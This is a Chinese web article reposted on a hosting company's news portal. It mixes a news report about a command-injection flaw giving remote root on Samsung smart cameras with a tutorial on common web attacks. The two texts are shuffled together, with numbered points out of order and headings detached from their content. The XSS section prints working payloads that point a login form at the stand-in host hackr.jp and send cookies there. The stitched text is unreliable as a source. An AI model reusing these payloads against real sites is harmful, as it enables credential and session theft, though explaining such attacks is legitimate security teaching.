安全人员在三星智能摄像头当中发现一个新的安全漏洞,攻击者借此可以获得root权限,并且远程运行命令。三星智能摄像头从本质上讲是一个IP摄像头,它允许用户从任何地点使用三星自家的服务连接并查看实时视频或记录事件。它提供了无缝的婴儿或宠物监控,企业和家庭的安全监控。

图片 1

简单的HTTP协议本身并不存在安全性问题,因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端,以及运行在服务器上的Web应用等资源才是攻击目标。

exploitee.rs网站公布了三星智能摄像头当中存在的一个漏洞,可以允许攻击者使用三星上次为三星智能摄像头修复漏洞而无意留下的一个web服务器,获得对设备的root访问权限。

随着网络视频监控摄像机进一步普及,尤其在当下物联网时代的趋势下,监控解决方案与越来越多的设备进行连接,虽然带来极大的便利,同时也产生了许多新的问题,例如网络安全便是其中最主要的问题。

图片 2

具体而言,三星试图通过去除本地网络接口,并迫使用户访问SmartCloud网站来修复设备的安全漏洞,但在同一时间,该公司还继续让服务器功能在本地运行。而事实证明,一个可能的漏洞使攻击者通过推送定制固件文件连接到这个Web界面。

在过去几年中,有关于摄像机被网络攻击的新闻不绝于耳,视频监控在网络安全挑战面前,与其他设备一样脆弱,如何强化网络安全,还需要从其常见被攻击的方式说起:

Web 是建立在 HTTP 协议上通信的

该IWATCH
install.php漏洞可以通过制定专门的文件名,然后存储在PHP系统调用tar命令加以利用。由于Web服务器作为root运行,文件名由用户提供,输入时没有安全处理,黑客可以内注入自己的命令来实现root远程命令执行。

一、在很多情况下,攻击者通常会对摄像机的协议和端口进行扫描,然后浏览和访问设备管理的页面,如果失败,便会选择更加复杂的方式进行扫描,从而找到摄像机,并模仿授权用户。值得注意的是,攻击者并不需要通过软件漏洞便能实现攻击摄像头,许多摄像头的设计缺陷,或者其他连接的设备一旦有安全漏洞,便能成为黑客攻击的切入口。

来自互联网的攻击大多是冲着Web站点来的,它们大多把Web应用作为攻击目标。

目前,三星尚未出台新的漏洞补丁来修复智能摄像头存在的这个漏洞。

从这点上可以看出如果摄像机产品在设计之初便实施构建了一定安全保护机制,那么即使摄像机在后续被发现存在漏洞,攻击想利用这些漏洞也并不是一件容易的事,同时设备商也会及时推送信息,类似其他网络设备一样,通过升级去提升安全等级;

=

图片 3

二、另外比较常见的方式是攻击者利用摄像机在开源或第三方库中已知的软件漏洞进行攻击,例如网络服务器是相对较为脆弱的组件,通常都可以看到关于黑客利用第三方网络服务器的漏洞进行访问摄像头的新闻;

一、针对Web应用的攻击技术

图片 4

攻击事件倾向

在客户端即可篡改请求:
在 Web
应用中,从浏览器接收到的HTTP请求的全部内容,都可以在客户端自由的更改、篡改。所以
Web 应用可能会接收到与预期数据不相同的内容。
在HTTP请求报文内加载攻击代码,就能发起对Web应用的攻击。

图片 5

对 Web 应用的攻击

针对 Web 应用的攻击模式: 主动攻击、被动攻击

主动攻击 是指:攻击者通过直接访问Web应用,把攻击代码传入的攻击模式。
由于该模式是直接针对服务器上的资源进行攻击,因此攻击者需要能够访问到那些资源。
例:SQL注入和OS命令注入攻击。

图片 6

主动攻击

被动攻击  是指:利用全套策略执行攻击代码的攻击模式。
攻击者不直接对目标Web应用访问发起攻击。
例:利用用户的身份攻击原本从互联网上无法直接访问的企业内部网络

图片 7

被动攻击

图片 8

利用被动攻击对企业内网发动攻击

=

稿源:cnbeta

三、攻击者利用命令注入攻击(Command
Injection)的方式,其是指由于Web应用程序对用户提交的数据过滤不严格,导致黑客可以通过构造特殊命令字符串的方式,将数据提交至Web应用程序中,并利用该方式执行外部程序或系统命令实施攻击,非法获取数据或者网络资源等。换句话说,只要开发者对数据过滤的好,利用好白名单,就可以规避这种攻击。

二、因输出值转义不完全引发的安全漏洞

实施 Web 应用的安全对策,大致分为两部分:
  ● 客户端的验证
  ● Web 应用端的验证(服务器端)
        ○ 输入值验证
        ○ 输出值验证

图片 9

验证数据的几个地方

多数情况下,采用 JS 在客户端验证数据。可是在客户端允许篡改数据或关闭
javascript,不适合将JS验证作为安全的防范对策。保留客户端验证只是为了尽早地识别输入错误,起到提高
UI 体验的作用。

Web 应用端的验证:
输入值验证:按 Web
应用内的处理可能被误认为是具有攻击性意义的代码。
                     
通常是检验是否符合系统业务逻辑的数值或检查字符编码等预防策略。
输出值验证:从数据库、文件系统、HTML 或邮件等输出 Web
应用处理的数据的时候,针对输出做值转义处理是一项至关重要的安全策略。输出值转义不完全时,会因触发攻击者传入的攻击代码,而给输出对象带来损害。

总结以上攻击方式,对于用户而言应该:

(一)跨站脚本攻击 (Cross-Site Scripting,XSS)

跨站脚本攻击是指:通过存在安全漏洞的 Web
网站注册用户的浏览器内运行非法的 HTML 标签或 JS 进行的一种攻击。
动态创建的 HTML
部分有可能隐藏着安全漏洞。攻击者编写脚本设下陷阱,用户在自己的浏览器上运行时,一不小心就会受到被动攻击。

可能造成的影响:     1. 利用虚假输入表单骗取用户个人信息。
    2. 利用脚本窃取用户的 Cookie
值,被害者在不知情的情况下,帮助攻击者发送恶意请求。
    3. 显示伪造的文章或图片。

XSS案例:

案例1:  在动态生成HTML处可能隐含安全漏洞
以编辑个人信息页面为例:

图片 10

编辑界面输入的字符串原样显示在确认界面

图片 11

按照输入内容原样显示的机制

输入带有HTML标签的字符串,浏览器会把用户输入的 < s >
解析成HTML标签。
删除线显示出来并不会造成太大的不利后果,但如果换成使用 script 标签呢?

案例2: 

XSS攻击是攻击者利用预先设置的陷阱触发的被动攻击

下图网站通过地址栏中 URI 的查询字段指定
ID,即相当于在表单内自动填写字符串的功能。就在这个地方,隐藏着可执行跨站脚本攻击的漏洞。

图片 12

通过地址栏中 URI 的查询字段指定 ID

充分熟知此处漏洞特点的攻击者,于是创建了下面这段潜入恶意代码的
URL。并隐藏植入事先准备好的欺诈邮件中或 Web 页面内,诱使用户去点击改
URL。

http://example.jp/login?ID="><script>var+f=document
.getElementById("login");+f.action="http://hackr.jp/pwget";+f.
method="get";</script>
    <div class="input_id">
        ID: <input type="text" name="ID" value="yama">
    </div>
...

=”” 
请求时对应的HTML源代码(摘录)

<form action="http://example.jp/login" method="post" id="login">
    <div class="input_id">
        ID: <input type="text" name="ID" value=""><script>var f=document.getElementById("login"); f.action="http://hackr.jp/pwget"; f.method="get";</script>
    </div>
...

案例3. 对用户 Cookie 的窃取攻击

除了表单,恶意构造的脚本同样能够以XSS的方式窃取到用户的 cookie 信息。

<script src=http://hackr.jp/xss.js></script>

文件的内容:

var content = escape(document.cookie);
document.write("<img src=http://hackr.jp/?");
document.write(content);
document.write(">");

在存在可跨站脚本攻击安全漏洞的Web应用上执行上面这段 JS
程序,即可访问到该 Web 应用所处域名下的 Cookie 信息。

图片 13

使用 XSS 攻击夺取 Cookie 信息

一是修改初始密码,同时值得人们注意的还有,除了初始密码的问题之外,制造商可能也会有“隐藏”的用户名及密码,其本义主要用于产品测试,但一旦被黑客发现和利用,同样也会形成极大的影响;二是及时关注厂商推送信息,做好设备安全升级工作。
当然这在充满未知的网络挑战面前只是基础的工作,攻击者能实现绕过攻击,即通过弱的安全认证方式访问摄像头,在更加复杂的情况下,也可运用恶意软件使用摄像机中的代码漏洞加载其他病毒文件,攻击其他的目标等等。

(二)SQL 注入攻击

SQL注入是指:针对 Web 应用使用的数据库,通过运行非法 SQL
而产生的攻击。有时会直接导致个人信息及机密信息的泄漏。

声明:本网站发布的内容以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-62778877-8306;邮箱:hyg@west.cn。本站原创内容未经允许不得转载,或转载时需注明出处::西部数码资讯门户
你的摄像头是如何被黑客入侵的?一般通过这三种方式

(三)OS 命令注入攻击

OS命令注入攻击是指:通过 Web
应用,执行非法的操作系统命令达到攻击的目的。只要在能调用 Shell
函数的地方就有存在被攻击的风险。
可以从Web应用中通过Shell来调用操作系统命令。倘若调用Shell时存在疏漏,就可以执行插入的非法OS命令。

(四)HTTP 首部注入攻击

HTTP首部注入攻击是指:攻击者通过在响应首部字段内插入换行,添加任意响应首部或主题的一种攻击。

(五)邮件首部注入攻击

邮件首部注入是指: Web 应用中的邮件发送功能,攻击者通过向邮件首部 To 或
Subject 内任意添加非法内容发起的攻击。
利用存在安全漏洞的网站,可对任意邮件地址发送广告邮件或病毒邮件。

(六)目录遍历攻击

目录遍历攻击是指:对本来无意公开的文件目录,通过非法截断其目录路径后,达成访问目的的一种攻击。
通过 Web
应用对文件处理操作时,在由外部指定文件名的处理存在疏漏的情况下,用户可使用
…/ 等相对路径定位到 /etc/passed
等绝对路径上,因此服务器上任意的文件或文件目录皆有可能被访问到。这样一来,就有可能非法浏览、篡改或删除
Web 服务器上的文件。

应关闭指定对任意文件名的访问权限。

(七)远程文件包含漏洞

远程文件包含漏洞是指:当部分脚本内容需要从其他文件读入时,攻击者利用指定外部服务器的
URL 充当依赖文件,让脚本读取之后,就可运行任意脚本的一种攻击。

应控制对任意文件名的指定。